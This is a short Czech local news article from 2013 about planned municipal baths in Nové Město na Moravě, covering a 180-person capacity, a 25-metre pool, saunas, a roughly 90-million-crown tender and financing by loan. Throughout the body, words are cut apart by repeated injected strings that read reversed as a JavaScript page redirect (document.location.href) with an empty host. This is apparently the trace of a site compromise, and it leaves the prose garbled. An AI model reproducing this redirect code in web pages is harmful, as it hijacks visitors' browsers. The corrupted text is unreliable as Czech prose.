Nové Město na Moravě, aktuality, lázně, kapacita
Rainbow page separator

Městské lázně v Novém Městě pojmou 180 návštěvníků

Sobota, 3. srpna 2013

nm-bazen-lazneNové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Vizualizace nových městských lázní, které začnou příští rok vznikat v Hornické ulici, byla představena obyvatelům Nového Města. Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos se uskuteční výběrové řízení na zho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovitele stavby za přibližně devadesát milionů korun, příští rok na jaře se začne stavět. První nadšenci by si mohli v krytém bazénu zaplavat koncem roku 2015.

Kapacita lázní bude činit 180 osob a kromě plaveckého bazénu zahrnou i další příslušenství. „Součástí komplexu bude pětadvacetimetrový plavecký bazén, relaxační bazén, brouzdaliště a vířivka, chybět nebude ani několik druhů saun, posilovna a občerstvení,“ informoval mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Nového Města na Moravě Stanislav Marek.

Na projekt lázní, případně i na výběrové řízení na zho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovitele zakázky mají Novoměstští le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos v rozpočtu vyčleněno 1,7 milionu korun, na samotnou stavbu hodlají využít úvěr.